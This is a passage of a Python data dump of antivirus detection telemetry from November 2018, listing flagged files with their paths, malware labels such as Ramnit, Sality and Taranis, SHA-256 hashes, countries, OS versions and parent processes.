  Row(detection=Row(filename='p711s-e5_update_21.110.99.03.00.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\E5573 UNLOCK\\2nd STEP(Huawei_E5573s-606_Firmware_21.110.99.03.00)\\P711s-E5_Update_21.110.99.03.00.exe', filesize=51456000, name='W32/Ramnit.CD.#M1.#R1'), hash='b14a8c1efd1b89b78cbe4989cee5f38fa16aa4a95852bc4aedbd3e2b0d9bca8a', metadata=Row(cmdline=None, country='CM', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eutcbbpe.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\euTcbBPe.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103426-67e284b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5ae221e\\AVSCAN-20181102-103254-62068CEC\\AVSCAN-20181102-103426-67E284B3', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:34:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta vice city user files.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\GTA Vice City User Files\\GTA Vice City User Files.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='d5e034cc16878cd4cdfeba80a60ab374fdf9ff2a33a1db4b33a6ede0a6c2c3f4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='\\\\\\/h \\\\\\/shared Global\\\\\\\\1f69fced099141d6983213ac44cf4800', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\WerFault.exe', parentsize=360448, timestamp='2018-11-02T09:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kibitzing.exe', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kibitzing.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9636803b93bc0c119a050695a35c0d1f20c9ee76efb8d01b3d5f73c40b702ba1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:18:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1944000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9f66401c4a386151597a7c5a4e6ca628538d6153c767d24990fd18d551dd8925', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-02T09:04:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00006e7c', filepath='C:\\Windows\\Temp\\6a4484e1-aeb0-4d81-9344-f4b765c978ce\\tmp0000043b\\tmp00006e7c', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='944e3766bcb24443ca3ffb92f46ad537814d94d0fe6394c9cd8f71fd0e52370a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.12.945.9202\\AdAwareService.exe', parentsize=732056, timestamp='2018-11-02T10:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221518-5d6b6c1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221427-55CFC5F3\\AVSCAN-20181102-221518-5D6B6C1F', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T13:14:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='passmarkkeyboardtest.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\PassMarkKeyboardTest.exe", filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081133-1ec1ba57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081133-1EC1BA57', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d047', filepath='\\\\?\\C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d047', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:11:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lepo_je_biti_sosed_sezona_1.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.593\\Lepo_je_biti_sosed_sezona_1.exe', filesize=5260000, name='PUA/EDownloader.Gen7.#M300.#R602456'), hash='c2621af26e54406adb55593c8ee2b80af6fef0eef053dd1c891def234c78d82c', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\NBA.2K9 - RELOADED\\\\\\\\NBA.2K9 - RELOADED.rar\\\\\\"', country='SI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-02T22:16:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101346-785f95a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-101346-785F95A1', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='8e71059717ca4cc753171e672e9cad09f48398f8f71a4f5142a481b829659af9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:15:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdiskserial.exe', filepath='E:\\HBCD\\Programs\\GetDiskSerial.exe', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='photofiltre7.exe', filepath='J:\\Lupo.PenSuite.v2016.Full.MULTI-FREE\\Lupo.PenSuite.v2016.Full.MULTI-FREE\\Lupo_PenSuite_v2016_Full\\Apps\\PhotoFiltre\\PhotoFiltre7.exe', filesize=3520000, name='W32/Neshta.A.#M1.#R1'), hash='d2fbf24697857cbe6c73dd7e2d63d9195479a09d633e2b1b1cf59dc63d7e164f', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='I:\\PROGRAMAS\\PNGoo.0.1.1\\PNGoo.exe', parentsize=91136, timestamp='2018-11-02T04:27:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1srgl5es5s0\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:52:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155910-e8575fcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_64c6717c\\AVSCAN-20181102-155759-E08129C9\\AVSCAN-20181102-155910-E8575FCD', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9bb403827bdf8c1112a659c220caaa0bef77a0c960175bdae55d23ca93973d52', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp002976f5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002976f5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:48:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='l110_x86_153ushomeexportasiaml_mp.exe', filepath='D:\\RECOVERY UFD PNY\\1 FAT32\\Lost Folders\\DIR291\\L110_x86_153UsHomeExportAsiaML_MP.exe', filesize=21504000, name='W32/Sality.AG.#M1.#R1'), hash='e1444c8782c58589d1a01e7783e5616178eb3a28d12888154b2b18049f1b0371', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:39:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f38e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f38e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:15:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237e85', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237e85', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:15:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002921fe', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002921fe', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:05:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:15:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eauninstall.exe', filepath='\\\\?\\F:\\Removable Disk\\Rovio\\NFS MW\\eauninstall.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='ca227ae63918b62481fad37283c4f6bc0790a86107534a52f5080c08207bf7cc', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:59:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00426710', filepath='C:\\Windows\\Temp\\tmp00002e64\\tmp00426710', filesize=704000, name='HEUR/AGEN.1031189.#M1.#R1'), hash='b3f74a9070d8463e4ae9690c36e2bd34ec2383bf5d56c9e1341bbf861d5628d5', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T14:31:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002905df', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002905df', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:32:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:57:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ed17d199416355b4980a6314211f4072d4f5f401ed69003e15d673832d8ef22f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\ED17D199416355B4980A6314211F4072D4F5F401ED69003E15D673832D8EF22F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ed17d199416355b4980a6314211f4072d4f5f401ed69003e15d673832d8ef22f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:42:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fbb824cb0f5a9380fe6745c68208e1913ab275012b94e75ed9cf4b7c1aed8b1e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FBB824CB0F5A9380FE6745C68208E1913AB275012B94E75ED9CF4B7C1AED8B1E', filesize=768000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='fbb824cb0f5a9380fe6745c68208e1913ab275012b94e75ed9cf4b7c1aed8b1e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:44:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183145-45613fee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183145-45613FEE', filesize=64000, name='VBA/Dldr.Agent.skjle.#M1.#R1'), hash='f150aa908aa923ddefe5a935d2c39ac3752a9b1dbf816f5a680512aebebed9de', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cam.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Nouveau dossier\\KilerRat v7.5.4 By Ahmed Ibrahim\\KilerRat v7.5.4\\Plugin\\cam.dll', filesize=64000, name='HEUR/AGEN.1032945.#M1.#R1'), hash='f7625119de43a747129977ae4bcb9a38a3bb49453afb1eafa3afaf2bc7308c05', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:13:15Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='gpestn 2013.exe', filepath='g:\\pro evolution soccer 2013 caf 4\\kitserver13\\data\\switches\\versions\\1.04\\gPESTN 2013.exe', filesize=20032000, name='W32/Ramnit.CD.#M1.#R1'), hash='11dc5e691fa1b79305f7734155dc84584a6ed6142c048ebd33b3f97fc6be8386', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:44:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup.exe', filepath='C:\\Users\\X\\Downloads\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T18:22:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oc48ycqq04ewk20i226skqcu 4wms.2miaukieiey2q0kogeeaagc0ommawggyq', filepath='H:\\\xa0\\oC48ycQQ04EwK20i226skQCU 4wms.2MIAUKIeiEY2q0KOgEeAagc0omMAwgGyQ', filesize=24632000, name='WORM/Taranis.2406.#M0.#R0'), hash='4f57433946394d849c81bc6959550b03bd9acbcd166bc7d8dabbd5d43faffc21', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-02T21:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:45:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122344-603e8209', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-122316-5A5F3162\\AVSCAN-20181102-122344-603E8209', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:56Z'), dt=datetime.date(2018, 11, 2)),
